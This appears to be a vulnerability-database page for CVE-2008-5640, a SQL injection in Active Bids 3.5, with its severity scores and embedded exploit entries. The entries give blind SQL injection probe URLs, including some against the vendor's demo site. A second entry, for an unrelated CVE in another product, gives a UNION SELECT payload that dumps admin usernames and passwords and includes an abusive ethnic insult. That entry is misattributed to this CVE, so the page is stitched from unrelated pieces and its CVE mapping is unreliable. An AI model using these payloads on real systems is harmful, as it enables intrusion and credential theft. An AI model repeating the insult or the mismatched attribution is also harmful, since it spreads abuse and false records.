CVE-2008-5640
Published 2008-12-17
CVE-2008-5640: SQL injection vulnerability in bidhistory.asp in Active Bids 3.5 allows remote attackers to execute arbitrary SQL commands via the ItemID parameter.
Priority P343 · high · 7.5 · CVSS 2.0
Vector: AV:N/AC:L/Au:N/C:P/I:P/A:P
EXPLOIT
EPSS: 1.20% (64.2th percentile)
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| activewebsoftwares | active_bids | — | — |
No detection rules found.
Exploit-DB
Active Bids 3.5 - 'itemID' Blind SQL Injection
exploitdb·2008-11-29
CVE-2008-5640 Active Bids 3.5 - 'itemID' Blind SQL Injection
---
[~]Type : Remote Blind SQL Injection Vulnerability
[~]Vendor : www.activewebsoftwares.com
[~]Software : Active Bids
[~]author : Mountassif Moad
http://site.il/activebids/bidhistory.asp?ItemID=354%20and%201=1
http://site.il/activebids/bidhistory.asp?ItemID=354%20and%201=0
Demo :
http://www.activewebsoftwares.com/demoactivebids/bidhistory.asp?ItemID=354%20and%201=1
http://www.activewebsoftwares.com/demoactivebids/bidhistory.asp?ItemID=354%20and%201=0
# you can exploit the bug with automatic blind SQL tools such as sqlmap or ...
# milw0rm.com [2008-11-29]
Exploit-DB
Ayco Okul Portali - 'linkid' SQL Injection
exploitdb·2008-10-10
CVE-2008-4574 Ayco Okul Portali - 'linkid' SQL Injection
---
Author : By Crackers_Child
Contact: [email protected]
Greetz : milw0rm.com & tryag.cc & All My Friends
Note : You dogs called the PKK; you can be neither Turk nor Kurd. You are plain sons of bitches!
Script : Ayco Okul Portali (tr) Sql injection Vulnerability
http://www.aspindir.com/goster/5640
Price : 100 €
Exploit : default.asp?tip=sollinkicerik&linkid=1+union+select+0,password,username,3+from+admin
Note : The nights turn to poison, believe me, I can't sleep!
# milw0rm.com [2008-10-10]
No writeups or analysis indexed.
http://secunia.com/advisories/32920
http://securityreason.com/securityalert/4776
http://www.securityfocus.com/bid/32544
http://www.vupen.com/english/advisories/2008/3302
https://exchange.xforce.ibmcloud.com/vulnerabilities/46912
https://www.exploit-db.com/exploits/7290
Published: 2008-12-17